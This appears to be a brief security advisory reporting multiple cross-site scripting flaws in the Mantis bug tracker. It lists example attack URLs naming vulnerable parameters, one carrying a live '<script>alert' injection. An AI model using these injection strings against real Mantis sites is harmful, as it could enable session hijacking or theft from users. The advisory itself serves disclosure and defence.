|
Mantis Multiple Cross-Site Scripting Vulnerabilities
An exploit is not required, but examples have been provided: http://www.example.com/login_page.php?return=[XSS] http://www.example.com/signup.php?username=user&email=[XSS] http://www.example.com/login_select_proj_page.php?ref=[XSS] http://www.example.com/login_select_proj_page.php?ref=%22%3E[XSS] http://www.example.com/view_all_set.php?type=1&reporter_id=5031&hide_status=80<script>alert('hi')</script> |
|
|
Privacy Statement |